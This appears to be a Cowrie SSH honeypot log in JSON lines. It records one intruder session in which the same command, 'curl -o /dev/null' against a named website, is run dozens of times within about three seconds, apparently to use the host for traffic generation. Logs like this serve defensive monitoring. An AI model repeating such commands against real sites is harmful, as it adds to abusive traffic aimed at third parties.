{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.843007Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.844085Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.880749Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.881593Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.922527Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.923414Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:50.961897Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:50.962791Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.004929Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.005949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.047401Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.048344Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.086343Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.086965Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.126442Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.127380Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.163918Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.165192Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.202801Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.203760Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.241177Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.242044Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.279201Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.280326Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.317472Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.318370Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.355197Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.356124Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.395590Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.396482Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.432881Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.433743Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.470595Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.471513Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.510385Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.511276Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.548095Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.548994Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.585432Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.586498Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.623325Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.624166Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.660660Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.661518Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.699361Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.700568Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.739818Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.740694Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.777627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.778544Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.816890Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.817758Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.863347Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.864237Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.905431Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.906285Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.944456Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.945341Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:51.982986Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:51.983827Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.024426Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.025336Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.063445Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.064365Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.101226Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.102057Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.139165Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.140193Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.176787Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.177664Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.214870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.215735Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.258592Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.259854Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.299446Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.300326Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.338489Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.339515Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.378799Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.379647Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.419154Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.420016Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.459661Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.460567Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.497371Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.498462Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.534990Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.535843Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.573627Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.574959Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.612092Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.613235Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.651229Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.652385Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.692998Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.694335Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.733654Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.734532Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.771949Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.772857Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.812001Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.813141Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.851224Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.852076Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.892752Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.893870Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.934493Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.935447Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:52.972508Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:52.973390Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.010186Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.011374Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.047805Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.048705Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.089207Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.090091Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.128258Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.129869Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.170566Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.171485Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.208833Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.209840Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.251714Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.252837Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.289650Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.290539Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.329205Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.command.input","input":"curl -o /dev/null https://ladamoscow.com/","message":"CMD: curl -o /dev/null https://ladamoscow.com/","sensor":"my-vps","timestamp":"2025-08-28T07:45:53.330119Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T07:45:53.367205Z","src_ip":"212.227.125.160","session":"c961b2cf6ae4"}
